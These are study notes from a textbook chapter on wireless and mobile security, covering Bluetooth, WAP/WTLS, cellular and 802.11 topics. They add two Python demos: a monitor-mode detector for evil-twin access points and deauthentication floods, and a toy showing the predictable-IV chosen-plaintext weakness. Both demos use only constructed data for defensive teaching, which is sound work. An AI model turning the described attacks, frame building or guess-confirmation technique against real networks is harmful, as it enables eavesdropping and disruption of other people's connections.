Writing Assignment #3
Wireless Security and Mobile Devices
Chapter 12
Principles of Computer Security, Fifth Edition
Copyright © 2018 by McGraw-Hill Education. All rights reserved.
Objectives
Describe the different wireless systems in use today.
Detail WAP and its security implications.
Identify 802.11’s security issues and possible solutions.
Learn about the different types of wireless attacks.
Examine the elements needed for enterprise wireless deployment.
Examine the security of mobile systems.
Key Terms (1 of 4)
Beacon frames
Bluebugging
Bluejacking
Bluesnarfing
Bluetooth
Bluetooth DoS
Captive portal
Containerization
Custom firmware
Direct-sequence spread spectrum (DSSS)
Disassociation
Extensible Authentication Protocol (EAP)
EAP-FAST
EAP-TLS
EAP-TTLS
Beacon frames – A series of frames used in Wi-Fi (802.11) to establish the presence of a wireless network device.
Bluebugging – The use of a Bluetooth-enabled device to eavesdrop on another person’s conversation using that person’s Bluetooth phone as a transmitter. The bluebug application silently causes a Bluetooth device to make a phone call to another device, causing the phone to act as a transmitter and allowing the listener to eavesdrop on the victim’s conversation in real time.
Bluejacking – The sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, tablets, or laptop computers.
Bluesnarfing – The unauthorized access of information from a Bluetooth-enabled device through a Bluetooth connection, often between phones, desktops, laptops, and tablets.
Bluetooth DoS – The use of Bluetooth technology to perform a denial-of-service attack against another device. In this attack, an attacker repeatedly requests pairing with the victim device. This type of attack does not divulge information or permit access, but it is a nuisance and, more importantly, if done repeatedly it can drain a device’s battery or prevent other operations from occurring on the victim’s device.
Captive portal – A website used to validate credentials before allowing access to a network connection.
Containerization – Dividing a device into a series of containers, with one container holding work-related materials and the other personal materials.
Custom firmware – Firmware for a device that has been altered from the original factory settings.
Direct-sequence spread spectrum (DSSS) – A method of distributing a communication over multiple frequencies to avoid interference and detection.
Disassociation – An attack against a wireless system designed to disassociate a host from the wireless access point, and from the wireless network. Disassociation attacks stem from the deauthentication frame that is in the IEEE 802.11 (Wi-Fi) standard.
Extensible Authentication Protocol (EAP) – A protocol defined in RFC 2284 (obsoleted by RFC 3748). EAP is a framework used to secure the authentication process; it is not itself an encryption method. Many variants exist.
EAP-FAST – EAP–Flexible Authentication via Secure Tunneling, described in RFC 4851 and proposed by Cisco as a replacement for LEAP, a previous Cisco version of EAP. It offers a lightweight tunneling protocol to enable authentication. Its distinguishing characteristic is the passing of a Protected Access Credential (PAC) that is used to establish a TLS tunnel through which client credentials are verified.
EAP-TLS – An IETF open standard (RFC 5216) that uses the Transport Layer Security (TLS) protocol to secure the authentication process. This is still considered one of the most secure implementations, primarily because common implementations employ client-side certificates.
EAP-TTLS – An extension of TLS called Tunneled TLS. In EAP-TTLS, the authentication process is protected by the tunnel from man-in-the-middle attacks, and although client certificates can be used, they are not required, making this easier to set up than EAP-TLS for clients without certificates.
Key Terms (2 of 4)
Evil twin
Firmware OTA updates
Geo-tagging
IEEE 802.1X
Infrared (IR)
Initialization vector (IV)
Jailbreaking
Jamming
MAC filtering
MIMO
Mobile device management (MDM)
Multimedia Messaging Service (MMS)
Near field communication (NFC)
Orthogonal frequency division multiplexing (OFDM)
Evil twin – A wireless attack performed using a second, rogue wireless access point designed to mimic a real access point.
Firmware OTA updates – A method of updating mobile device firmware without bringing the device to a central location or connection for updating.
Geo-tagging – The metadata that contains location-specific information that is attached to other data elements.
IEEE 802.1X – An IEEE standard for performing authentication over networks.
Infrared (IR) – A band of electromagnetic energy just beyond the red end of the visible color spectrum.
Initialization vector (IV) – A data value used to seed a cryptographic algorithm, providing for a measure of randomness.
Jailbreaking – The process of breaking OS security features designed to limit interactions with the OS itself. Commonly performed on mobile phones to unlock features or break locks to carriers.
Jamming – A form of denial of service, specifically against the radio spectrum aspect of wireless. Just as other DoS attacks can be used to manipulate things behind the scenes, jamming a wireless AP can set up a further attack, such as causing clients to attach to a rogue AP.
MAC filtering – The use of layer 2 MAC addresses to filter traffic to only authorized NIC cards.
MIMO – A set of multiple-input and multiple-output antenna technologies where the available antennas are spread over a multitude of independent access points each having one or multiple antennas.
Mobile device management (MDM) – A marketing term for a collective set of commonly employed protection elements associated with mobile devices.
Multimedia Messaging Service (MMS) – A standard protocol used to send messages, including multimedia content to and from mobile devices over a cellular network.
Near field communication (NFC) – A set of standards and protocols for establishing a communication link over very short distances. Used in mobile devices.
Orthogonal frequency division multiplexing (OFDM) – Multiplexes, or separates, the data to be transmitted into smaller chunks and then transmits the chunks on several subchannels. This use of subchannels is what the “frequency division” portion of the name refers to. Both of these techniques, multiplexing and frequency division, are used to avoid interference. Orthogonal refers to the manner in which the subchannels are assigned, principally to avoid crosstalk, or interference with your own channels.
Key Terms (3 of 4)
PEAP
Radio Frequency Identification (RFID)
RC4 stream cipher
Remote wiping
Replay attack
Rogue access point
Rooting
Screen locking
Service set identifier (SSID)
Short Message Service (SMS)
Sideloading
Site survey
Storage segmentation
PEAP – Protected EAP (PEAP) was developed to protect the EAP communication by encapsulating it with TLS. This is an open standard developed jointly by Cisco, Microsoft, and RSA. EAP was designed assuming a secure communication channel; PEAP provides that protection as part of the protocol via a TLS tunnel. PEAP is widely supported by vendors for use over wireless networks.
Radio Frequency Identification (RFID) – RFID tags are used in a wide range of use cases, from tracking devices to tracking keys. The unique serialization of these remotely readable devices has made them useful in a wide range of applications. RFID tags come in several different forms and can be classified as either active or passive.
RC4 stream cipher – A stream cipher used in TLS and WEP.
Remote wiping – An action that typically removes data stored on the device and resets the device to factory settings.
Replay attack – An attack that occurs when the attacker captures a portion of a communication between two parties and retransmits it at a later time.
Rogue access point – An unauthorized access point inserted into a network allowing unauthorized wireless access.
Rooting – A process whereby OS controls are bypassed. This is the term frequently used for Android devices.
Screen locking – A phone’s capability whereby one must enter a passcode or PIN to unlock the device. It is highly recommended that screen locks be enforced for all mobile devices.
Service set identifier (SSID) – Identifies a specific 802.11 wireless network. It transmits information about the access point to which the wireless client is connecting.
Short Message Service (SMS) – A standard protocol used to send messages to and from mobile devices over a cellular network. SMS is limited to short text-only messages of less than 160 characters and is carried over the signaling path of the cellular network when signaling data is not being sent.
Sideloading – The process of adding apps to a mobile device without using the authorized store associated with the device.
Site survey – Involves several steps: mapping the floor plan, testing for RF interference, testing for RF coverage, and analysis of material via software.
Storage segmentation – A process similar to containerization in that it represents a logical separation of the storage on the device.
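As an added example (not from the textbook), the following Python builds a few constructed 802.11 management frames and runs the kind of monitor-mode check a defender would use against the terms defined above: a beacon advertising a protected SSID from a BSSID not on the authorized list (rogue access point / evil twin) and a burst of deauthentication frames claiming one BSSID (disassociation attack). The addresses, SSIDs, the 10-frames-per-second threshold and the frame builders are all constructed for the demo.

```python
import struct
from collections import defaultdict

# 802.11 management-frame subtypes (frame control type bits = 00 for management)
MGMT_BEACON, MGMT_DISASSOC, MGMT_DEAUTH = 0x8, 0xA, 0xC


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame):
    """Decode the fixed 24-byte 802.11 MAC header.

    Returns (subtype, dst, src, bssid, body) for management frames, None otherwise.
    Frame Control is little-endian; in its first octet bits 0-1 are the protocol
    version, bits 2-3 the type and bits 4-7 the subtype.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0:
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    return subtype, mac_str(dst), mac_str(src), mac_str(bssid), frame[24:]


def beacon_ssid(body):
    """Pull the SSID out of a beacon body: 8-byte timestamp, 2-byte interval,
    2-byte capability, then tagged information elements; element ID 0 is the SSID."""
    pos = 12
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        if tag == 0:
            return body[pos + 2:pos + 2 + length].decode("utf-8", "replace")
        pos += 2 + length
    return None


# --- constructed sample traffic (built here, not captured) ----------------------

def build_mgmt_frame(subtype, dst, src, bssid, body):
    frame_control = bytes([subtype << 4, 0x00])          # type 00 = management
    return frame_control + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body


def build_beacon(bssid, ssid):
    fixed = struct.pack("<QHH", 0, 100, 0x0411)          # timestamp, interval, capability
    ssid_ie = bytes([0, len(ssid)]) + ssid.encode()
    return build_mgmt_frame(MGMT_BEACON, b"\xff" * 6, bssid, bssid, fixed + ssid_ie)


def build_deauth(bssid, station, reason=1):
    return build_mgmt_frame(MGMT_DEAUTH, station, bssid, bssid, struct.pack("<H", reason))


# --- detection -------------------------------------------------------------------

def analyze(events, authorized, flood_threshold=10, window_s=1.0):
    """Scan (timestamp, frame) pairs from a monitor-mode capture.

    authorized maps each protected SSID to the set of BSSIDs allowed to beacon it.
    Alerts on (a) a protected SSID beaconed by any other BSSID (rogue AP / evil twin)
    and (b) flood_threshold or more deauth/disassoc frames claiming one BSSID within
    window_s seconds (disassociation attack).
    """
    alerts, kicks, seen, flooded = [], defaultdict(list), set(), set()
    for ts, frame in events:
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            continue
        subtype, _dst, _src, bssid, body = parsed
        if subtype == MGMT_BEACON:
            ssid = beacon_ssid(body)
            if ssid in authorized and bssid not in authorized[ssid] and (ssid, bssid) not in seen:
                seen.add((ssid, bssid))
                alerts.append(f"rogue/evil-twin: SSID {ssid!r} beaconed by unknown BSSID {bssid}")
        elif subtype in (MGMT_DEAUTH, MGMT_DISASSOC):
            stamps = kicks[bssid]
            stamps.append(ts)
            while stamps and ts - stamps[0] > window_s:   # slide the window forward
                stamps.pop(0)
            if len(stamps) >= flood_threshold and bssid not in flooded:
                flooded.add(bssid)
                alerts.append(f"deauth/disassoc flood: {len(stamps)} frames in {window_s}s claiming BSSID {bssid}")
    return alerts


def demo():
    ap = bytes.fromhex("020000000001")        # constructed: the real CorpNet AP
    twin = bytes.fromhex("020000000099")      # constructed: an unknown AP using the same SSID
    station = bytes.fromhex("02000000aa01")   # constructed: one client
    authorized = {"CorpNet": {mac_str(ap)}}
    events = [(0.0, build_beacon(ap, "CorpNet")), (0.1, build_beacon(ap, "CorpNet")),
              (0.2, build_beacon(twin, "CorpNet")), (0.3, build_beacon(ap, "GuestNet"))]
    # a burst of deauthentication frames carrying the real AP's address, 20 ms apart
    events += [(1.0 + i * 0.02, build_deauth(ap, station)) for i in range(12)]
    return analyze(events, authorized)


if __name__ == "__main__":
    for line in demo():
        print(line)
```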
Key Terms (4 of 4)
Temporal Key Integrity Protocol (TKIP)
USB OTG (USB On-The-Go)
WAP gap
War-chalking
War dialing
War driving
Wi-Fi Protected Access 2 (WPA2)
WiMAX
Wired Equivalent Privacy (WEP)
Wireless Application Protocol (WAP)
Wireless Transport Layer Security (WTLS)
ZigBee
Temporal Key Integrity Protocol (TKIP) – A security protocol used in 802.11 wireless networks.
USB OTG (USB On-The-Go) – An extension of USB technology that facilitates direct connection between USB OTG–enabled mobile devices.
WAP gap – Refers to the confidentiality of information where the two different networks meet on the WAP gateway.
War-chalking – The act of using chalk on sidewalks to mark some of the wireless networks people have found.
War dialing – The process of dialing a list of phone numbers looking for modem-connected computers.
War driving – The act of driving around with a wireless locator program recording the number of networks found and their locations.
Wi-Fi Protected Access 2 (WPA2) – A protocol to secure wireless communications using a subset of the 802.11i standard.
WiMAX – A wireless band that refers to the set of 802.16 wireless network standards ratified by the WiMAX Forum.
Wired Equivalent Privacy (WEP) – An 802.11 protocol that uses a cipher to encrypt the data as it is transmitted through the air.
Wireless Application Protocol (WAP) – A lightweight protocol designed for mobile devices.
Wireless Transport Layer Security (WTLS) – A lightweight security protocol designed for WAP.
ZigBee – A low-power, personal area networking technology described by the IEEE 802.15.4 series.
Introduction to Wireless Networking (1 of 3)
Wireless networking is the transmission of packetized data by means of a physical topology that does not use direct physical links.
Bluetooth is a short-range wireless protocol typically used on small devices such as mobile phones.
Wireless is problematic from a security standpoint.
Wireless does away with the physical limitations.
If an attacker gets close enough to the signal’s source, he can listen to the access point and clients talking and capture all the packets for examination.
The IEEE 802.11 protocol has been standardized by the IEEE for wireless local area networks (LANs). Three versions are currently in production—802.11g, 802.11a, and 802.11n. The latest standard is 802.11ac, but it provides backward compatibility with 802.11g hardware. Cellular phone technology has moved rapidly to embrace data transmission and the Internet.
The Wireless Application Protocol (WAP) was one of the pioneers of mobile data applications, but it has been overtaken by a variety of protocols pushing us to fourth-generation (4G) mobile networks.
Bluetooth is a short-range wireless protocol typically used on small devices such as mobile phones. Early versions of these phones also had Bluetooth on and discoverable as a default, making the compromise of a nearby phone easy. Security research has focused on finding problems with these devices simply because the devices are so common.
Introduction to Wireless Networking (2 of 3)
There are several different wireless bands in common use today.
Wi-Fi series refers to the 802.11 Wireless LAN standards certified by the Wi-Fi Alliance.
WiMAX refers to the set of 802.16 wireless network standards ratified by the WiMAX Forum.
ZigBee is a low-power, personal area networking technology described by the IEEE 802.15.4 series.
Tech Tip: There are several different wireless bands in common use today, the most common of which is the Wi-Fi series, referring to the 802.11 Wireless LAN standards certified by the Wi-Fi Alliance. Another set of bands is WiMAX, which refers to the set of 802.16 wireless network standards ratified by the WiMAX Forum. Lastly, there is ZigBee, a low-power, personal area networking technology described by the IEEE 802.15.4 series.
Introduction to Wireless Networking (3 of 3)
Figure 12.1 Wireless transmission extending beyond the facility’s walls
If an attacker can get close enough to the signal’s source as it is being broadcast, he can at the very least listen to the access point and clients talking to capture all the packets for examination, as depicted in this figure.
Attackers can also try to modify the traffic being sent or try to send their own traffic to disrupt the system. In this chapter, you will learn about the different types of attacks that wireless networks face.
Mobile Phones (1 of 2)
Today’s smartphones support multiple wireless data access methods.
This includes 802.11, Bluetooth, and cellular.
The Wireless Application Protocol (WAP) attempted to satisfy the needs for more data on mobile devices, but it is falling by the wayside as the mobile network capabilities increase.
The need for more and more bandwidth has pushed carriers to adopt a more IP-centric routing methodology.
The need for more and more bandwidth has pushed carriers to adopt a more IP-centric routing methodology with technologies such as High Speed Packet Access (HSPA) and Evolution Data Optimized (EVDO). Mobile phones have ruthlessly advanced with new technologies and services, causing phones and the carrier networks that support them to be described in generations—1G, 2G, 3G, and 4G. 1G refers to the original analog cellular standard, Advanced Mobile Phone System (AMPS). 2G refers to the digital network that superseded it. 3G is the system of mobile networks that followed, with many different implementations carrying data at up to 400 Kbps. 4G represents the current state of mobile phones with LTE being the primary method. 4G allows carriers to offer a wider array of services to the consumer, including broadband data service up to 14.4 Mbps and video calling. 4G is also a move to an entirely IP-based network for all services, running voice over IP (VoIP) on your mobile phone and speeds up to 1 Gbps.
All of these “gee-whiz” features are nice, but how secure are your bits and bytes going to be when they’re traveling across a mobile carrier’s network? All the protocols mentioned have their own security implementations—WAP applies its own Wireless Transport Layer Security (WTLS) to attempt to secure data transmissions, but WAP still has issues such as the “WAP gap” (as discussed next). 3G networks have attempted to push a large amount of security down the stack and rely on the encryption designed into the wireless protocol.
Mobile Phones (2 of 2)
Early cell phones just allowed you to make calls.
Today’s phones allow you to carry computers in your pocket.
When cellular phones first hit the market, security wasn’t an issue—if you wanted to keep your phone safe, you’d simply keep it physically secure and not loan it to people you didn’t want making calls. Its only function was that of a telephone.
The advance of digital circuitry has added amazing power in smaller and smaller devices, causing security to be an issue as the software becomes more and more complicated. Today’s small and inexpensive products have made the wireless market grow by leaps and bounds, as traditional wireless devices such as cellular phones and pagers have been replaced by tablets and smartphones.
Wireless Application Protocol (1 of 5)
WAP was introduced to compensate for the relatively low amount of computing power on handheld devices as well as the generally poor network throughput of cellular networks.
Wireless Transport Layer Security (WTLS) encryption scheme encrypts the plaintext data and then sends it over the airwaves as ciphertext.
The originator and the recipient both have keys to decrypt the data and reproduce the plaintext.
Wireless Application Protocol (2 of 5)
WTLS uses a modified version of the Transport Layer Security (TLS) protocol.
WTLS supports several bulk encryption algorithms.
WTLS implements integrity through the use of message authentication codes (MACs).
The TLS protocol that WTLS is based on is designed around Internet-based computers.
WTLS must cope with small amounts of memory and limited processor capacity.
Wireless Application Protocol (3 of 5)
The WTLS protocol is designed around more capable servers than devices and can allow connections with little to no security.
Clients with low memory or CPU capabilities cannot support encryption, which greatly reduces confidentiality.
Authentication is optional and omitting it leaves the connection vulnerable to a man-in-the-middle–type attack.
General flaws in the protocol’s implementation exist.
Known security vulnerabilities include the chosen plaintext attack, the PKCS #1 attack, and the alert message truncation attack.
Wireless Application Protocol (4 of 5)
The chosen-plaintext attack works on the principle of a predictable initialization vector (IV).
Concern over the WAP gap involves confidentiality of information where the two different networks meet at the WAP gateway.
WTLS acts as the security protocol for the WAP network, and TLS is the standard for the Internet.
The WAP gateway has to perform translation from one encryption standard to the other.
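To make the IV point concrete, here is an added example (not from the textbook) in Python: a toy CBC channel using the WTLS-style rule that derives each record’s IV from its sequence number, beside the random-IV fix, showing that only the predictable rule lets a chosen plaintext confirm a guess about an earlier record’s contents. The HMAC-based block function, the key, IV_0 and the “PIN=” record are constructed stand-ins.

```python
import hashlib
import hmac
import secrets

BLOCK = 16  # block size in bytes


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    """Stand-in for a block cipher's encryption direction: HMAC-SHA256 truncated to
    one block. It is keyed and deterministic, which is all the CBC equality leak
    shown below depends on; it is not a real (invertible) cipher."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def cbc_encrypt(key, iv, plaintext):
    """Textbook CBC: C_i = E_k(P_i XOR C_(i-1)) with C_0 = IV; input must be block-aligned."""
    assert len(plaintext) % BLOCK == 0
    prev, blocks = iv, []
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor_bytes(plaintext[i:i + BLOCK], prev))
        blocks.append(prev)
    return b"".join(blocks)


def seq_pad(seq):
    return seq.to_bytes(BLOCK, "big")


class PredictableIVSender:
    """Models the WTLS rule IV_s = IV_0 XOR pad(s): IV_0 is secret key material and s
    is the record sequence number sent in the clear. IV_0 itself never leaks, but
    IV_s XOR IV_t = pad(s) XOR pad(t) is known to anyone who can read the sequence
    numbers, which is exactly what the chosen-plaintext attack needs."""

    def __init__(self, key, iv0):
        self.key, self._iv0, self.seq = key, iv0, 0

    def _iv(self, seq):
        return xor_bytes(self._iv0, seq_pad(seq))

    def send(self, plaintext):
        """Encrypt one record and return (sequence number, ciphertext)."""
        seq, self.seq = self.seq, self.seq + 1
        return seq, cbc_encrypt(self.key, self._iv(seq), plaintext)


class RandomIVSender(PredictableIVSender):
    """Hardened form: a fresh unpredictable IV per record. A real record would carry
    the IV next to the ciphertext; it is omitted here because nothing decrypts."""

    def _iv(self, seq):
        return secrets.token_bytes(BLOCK)


def guess_is_confirmed(sender, target_seq, target_ct, guess):
    """The chosen-plaintext principle. Having seen record t, a party who can get one
    chosen record encrypted next (modelled as a direct call to send) submits
    P' = guess XOR pad(t) XOR pad(n). Under the predictable rule the IV terms cancel,
    so the first ciphertext block equals the target's exactly when guess is the
    target's first plaintext block. Under random IVs the cancellation fails and the
    comparison carries no information."""
    probe = xor_bytes(xor_bytes(guess, seq_pad(target_seq)), seq_pad(sender.seq))
    _, ct = sender.send(probe)
    return ct[:BLOCK] == target_ct[:BLOCK]


def demo():
    """Returns {scheme: (right guess confirmed?, wrong guess confirmed?)}."""
    key = hashlib.sha256(b"constructed demo key").digest()              # constructed
    iv0 = hashlib.sha256(b"constructed secret IV_0").digest()[:BLOCK]  # constructed
    secret = b"PIN=4931;padding"   # constructed 16-byte first block of the victim's record
    wrong = b"PIN=0000;padding"
    results = {}
    for name, cls in (("predictable_iv", PredictableIVSender), ("random_iv", RandomIVSender)):
        sender = cls(key, iv0)
        t, ct = sender.send(secret)                 # the record an observer captured
        results[name] = (guess_is_confirmed(sender, t, ct, secret),
                         guess_is_confirmed(sender, t, ct, wrong))
    return results


if __name__ == "__main__":
    print(demo())  # {'predictable_iv': (True, False), 'random_iv': (False, False)}
```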
Wireless Application Protocol (5 of 5)
Figure 12.2 The WAP gap shows an unencrypted space between two enciphered connections.
Some concern over the so-called WAP gap involves confidentiality of information where the two different networks meet at the WAP gateway, as shown in this figure.
3G Mobile Networks
Several competing data transmission standards, such as HSPA and EVDO, exist for 3G networks.
All standards include transport layer encryption protocols to secure the voice traffic traveling across the wireless signal as well as the data sent by the device.
KASUMI is the proposed 3G cryptographic standard.
This modified version of the MISTY1 algorithm uses 64-bit blocks and 128-bit keys.
Multiple attacks have been launched against this cipher.
Our cell phones are one of the most visible indicators of advancing technology. Within recent memory, we were forced to switch from old analog phones to digital models. The networks have been upgraded to 3G, greatly enhancing speed and lowering latency. This has reduced the need for lightweight protocols to handle data transmission, and more standard protocols such as IP can be used. The increased power and memory of the handheld devices also reduce the need for lighter-weight encryption protocols. This has caused the protocols used for 3G mobile devices to build in their own encryption protocols. Security will rely on these lower-level protocols or standard application-level security protocols used in normal IP traffic.
Multiple attacks have been launched against this cipher. While the attacks tend to be impractical, this shows that application layer security is needed for secure transmission of data on mobile devices. WAP and WTLS can be used over the lower-level protocols, but traditional TLS can also be used.
4G Mobile Networks
4G can support high-quality VoIP connections, video calls, and real-time video streaming.
True 4G would require a firm to meet all of the technical standards issued by the ITU, including specifications that apply to the tower side of the system.
Most 4G deployments are continuations of technologies already deployed—just newer evolutions of standards.
Just as the mobile network carriers were finishing the rollout of 3G services, 4G networks appeared on the horizon. The desire for anywhere, anytime Internet connectivity at speeds near that of a wired connection drives deployment of these next-generation services. 4G can support high-quality VoIP connections, video calls, and real-time video streaming. Just as 3G had some intermediaries that were considered 2.9G, LTE and WiMAX networks are sometimes referred to as 3.5G, 3.75G, or 3.9G. The carriers are marketing these new networks as 4G, although they do not adhere to the ITU standards for 4G speeds.
Some of the 4G requirements are:
Be based on an all-IP packet switched network
Offer high quality of service for next-generation multimedia support
Smooth handovers across heterogeneous networks
Peak data rates of up to approximately 100 Mbps for high mobility (mobile access)
Peak data rates of up to approximately 1 Gbps for low mobility such as nomadic/local wireless access
Dynamically share and use the network resources to support more simultaneous users per cell
Use scalable channel bandwidths of 5–20 MHz, optionally up to 40 MHz
Peak link spectral efficiency of 15 bps/Hz in the downlink, and 6.75 bps/Hz in the uplink
To achieve these and other technical elements requires specific tower-side equipment as well as handset specifications. Different carriers have chosen different sets of these to include in their offerings, each building upon their existing networks and existing technologies.
Most 4G deployments are continuations of technologies already deployed—just newer evolutions of standards. This is how LTE, LTE Advanced, WiMAX, and WiMAX 2 were born. LTE and WiMAX series come from separate roots, and are not interchangeable. Within the families, interoperability is possible and is dependent upon carrier implementation.
SATCOM
SATCOM (Satellite Communications) is the use of terrestrial transmitters and receivers and satellites in orbit to transfer the signals.
SATCOM can be one way, as in satellite radio, but for most communications two-way signals are needed.
In high-density urban areas, cost and line-of-sight issues make SATCOM a costly option.
In rural or remote areas, or mobile settings such as at sea, SATCOM is one of the only options for communications.
Bluetooth (1 of 3)
Bluetooth is a short-range (approx. 32 feet), low-power wireless protocol transmitting in the 2.4 GHz band.
Bluetooth transmits data in Personal Area Networks (PANs) through mobile phones, laptops, printers, and audio devices.
Version 1.2 allows speeds up to 721 Kbps and improves resistance to interference over version 1.1.
Bluetooth 2.0 introduced enhanced data rate (EDR), which allows the transmission of up to 3.0 Mbps.
Bluetooth was originally developed by Ericsson and known as multi-communicator link; in 1998, Nokia, IBM, Intel, and Toshiba joined Ericsson and adopted the Bluetooth name. This consortium became known as the Bluetooth Special Interest Group (SIG). The SIG now has more than 24,000 members and drives the development of the technology and controls the specification to ensure interoperability.
Most people are familiar with Bluetooth as it is part of many mobile phones and headsets, such as those shown in Figure 12.3. This short-range, low-power wireless protocol transmits in the 2.4 GHz band, the same band used for 802.11. The concept for the short-range (approx. 32 feet) wireless protocol is to transmit data in personal area networks (PANs).
Bluetooth transmits and receives data from a variety of devices, the most common being mobile phones, laptops, printers, and audio devices. The mobile phone has driven a lot of Bluetooth growth and has even spread Bluetooth into new cars as a mobile phone hands-free kit.
Bluetooth has gone through a few releases. Version 1.1 was the first commercially successful version, with version 1.2 released in 2007 and correcting some of the problems found in 1.1. Version 1.2 allows speeds up to 721 Kbps and improves resistance to interference. Version 1.2 is backward-compatible with version 1.1. With the rate of advancement and the life of most tech items, Bluetooth 1 series is basically extinct. Bluetooth 2.0 introduced enhanced data rate (EDR), which allows the transmission of up to 3.0 Mbps. Bluetooth 3.0 has the capability to use an 802.11 channel to achieve speeds up to 24 Mbps. The current version is the Bluetooth 4.0 standard with support for three modes: classic, high speed, and low energy.
Bluetooth 4 introduces a new method to support collecting data from devices that generate data at a very low rate. Some devices, such as medical devices, may only collect and transmit data at low rates. This feature, called Low Energy (LE), was designed to aggregate data from various sensors, like heart rate monitors, thermometers, and so forth, and carries the commercial name Bluetooth Smart.
As Bluetooth became popular, people started trying to find holes in it.
Bluetooth features easy configuration of devices to allow communication, with no need for network addresses or ports. Bluetooth uses pairing to establish a trust relationship between devices. To establish that trust, the devices advertise capabilities and require a passkey. To help maintain security, most devices require the passkey to be entered into both devices; this prevents a default passkey–type attack. The Bluetooth protocol’s advertisement of services and pairing properties is where some of the security issues start.
Bluetooth (2 of 3)
Figure 12.3 Headsets and cell phones are two of the most popular types of Bluetooth-capable devices.
Most people are familiar with Bluetooth as it is part of many mobile phones and headsets, such as those shown in this figure.
Bluetooth (3 of 3)
Bluetooth 3.0 has the capability to use an 802.11 channel to achieve speeds up to 24 Mbps.
The Bluetooth 4.0 standard supports three modes: classic, high speed, and low energy.
Bluetooth 4 introduces a new method to support collecting data from devices that generate data at a very low rate.
Bluetooth features easy configuration of devices to allow communication, with no need for network addresses or ports.
Bluetooth Attacks
Bluetooth is open to connection and attack from outside the intended sender and receiver.
Several different attack modes have been discovered that can be used against Bluetooth systems.
Software and protocol updates have helped to improve the security of the protocol.
Almost all phones now keep Bluetooth turned off by default, and they allow you to make the phone discoverable for only a limited amount of time.
Near Field Communication
Near field communication (NFC) is a set of wireless technologies.
NFC enables smartphones and other devices to establish radio communication over a short proximity, typically a distance of 10 cm (3.9 in) or less.
This technology did not see much use until recently, when it started being employed to move data between cell phones and in mobile payment systems.
NFC is likely to become a high-use technology in the years to come.
NFC is likely to become a high-use technology in the years to come, as multiple uses exist for the technology, and the next generation of smartphones is sure to see this as a standard function.
ANT
A multicast wireless sensor network technology that operates in the 2.4-GHz ISM band.
ANT is a proprietary method but has open access and a protocol stack to facilitate communication.
ANT is conceptually similar to Bluetooth LE.
ANT is oriented toward usage with sensors, such as heart rate monitors, fitness devices, and personal devices.
ANT uses a unique isochronous network technology.
Infrared
A band of electromagnetic energy just beyond the red end of the visible color spectrum.
IR made its debut in computer networking as a wireless method to connect to printers.
Now that wireless keyboards, wireless mice, and mobile devices exchange data via IR, it seems to be everywhere.
IR cannot penetrate walls but bounces off them.
IR cannot penetrate other solid objects.
Items stacked in front of the transceiver cause signal loss.
USB
The ubiquitous standard for connecting devices with cables.
USB ports have greatly expanded users’ ability to connect devices to their computers.
USB ports automatically recognize a device being plugged into the system and usually work without the user needing to add drivers or configure software.
Virtually anything that can consume or deliver data connects via USB.
USB drive keys: flash memory with a USB interface.
IEEE 802.11 Series
802.11 was a new standard for sending packetized data traffic over radio waves in the unlicensed 2.4 GHz band.
This group of IEEE standards is also called Wi-Fi.
A device marked as Wi-Fi Certified adheres to the interoperability standards of the Wi-Fi Alliance.
Direct-sequence spread spectrum (DSSS)
A modulation type that spreads the traffic sent over the entire bandwidth of the channel; used by 802.11b.
Orthogonal frequency division multiplexing (OFDM)
A modulation type that splits the channel into many narrow subcarriers transmitting in parallel; used by 802.11a/g/n/ac.
Features of 802.11b and 802.11a were later joined to create 802.11g, an updated standard that allows the faster speeds of the 5 GHz specification (802.11a) on the 2.4 GHz band. Security problems were discovered in the implementations of these early wireless standards, principally involving the Wired Equivalent Privacy (WEP) protocol. These problems included an attacker's ability to break the cryptography and monitor other users' traffic. The security problems in WEP were a top concern until the adoption of 802.11i-compliant products enhanced the security with Wi-Fi Protected Access (WPA), discussed later in the chapter. 802.11ac was the latest standard at the time of writing; it focuses on achieving much higher speeds for wireless networks.
802.11: Individual Standards (1 of 4)
The 802.11b protocol provides for multiple-rate Ethernet over 2.4 GHz spread-spectrum wireless.
Most common layout is a point-to-multipoint environment.
802.11a uses a higher band and has higher bandwidth.
It operates in the 5 GHz spectrum using OFDM and supports rates of up to 54 Mbps.
The higher frequency shortens the usable range.
The 802.11g standard uses portions of both 802.11a and 802.11b.
The 802.11b protocol provides for multiple-rate Ethernet over 2.4 GHz spread-spectrum wireless. It provides transfer rates of 1 Mbps, 2 Mbps, 5.5 Mbps, and 11 Mbps and uses DSSS. The most common layout is a point-to-multipoint environment, with the available bandwidth being shared by all users. Typical range is roughly 100 yards indoors and 300 yards outdoors, line of sight. While the wireless transmissions of 802.11 can penetrate some walls and other objects, the best range is offered when both the access point and network client devices have an unobstructed view of each other.
802.11a uses a higher band and has higher bandwidth. It operates in the 5 GHz spectrum using OFDM. Supporting rates of up to 54 Mbps, it is the faster brother of 802.11b; however, the higher frequency used by 802.11a shortens the usable range of the devices and makes it incompatible with 802.11b. The chipsets tend to be more expensive for 802.11a, which has slowed adoption of the standard.
802.11: Individual Standards (2 of 4)
All these protocols operate in bands that are “unlicensed” by the FCC.
The 802.11 standard includes attempts at rudimentary authentication and confidentiality controls.
Authentication is handled in its most basic form by the 802.11 access point (AP), forcing the clients to perform a handshake when attempting to “associate” to the AP.
Association is the process required before the AP will allow the client to talk across the AP to the network.
The 802.11g standard uses portions of both of the other standards: it uses the 2.4 GHz band for greater range but uses the OFDM transmission method to achieve the faster 54 Mbps data rates. As it uses the 2.4 GHz band, this standard interoperates with the older 802.11b standard. This allows an 802.11g access point (AP) to give access to both “G” and “B” clients.
The 802.11n version improves on the older standards by greatly increasing speed. It has a functional data rate of up to 600 Mbps, gained through the use of wider bands and multiple-input multiple-output (MIMO) processing. MIMO uses multiple antennas and can bond separate channels together to increase data throughput.
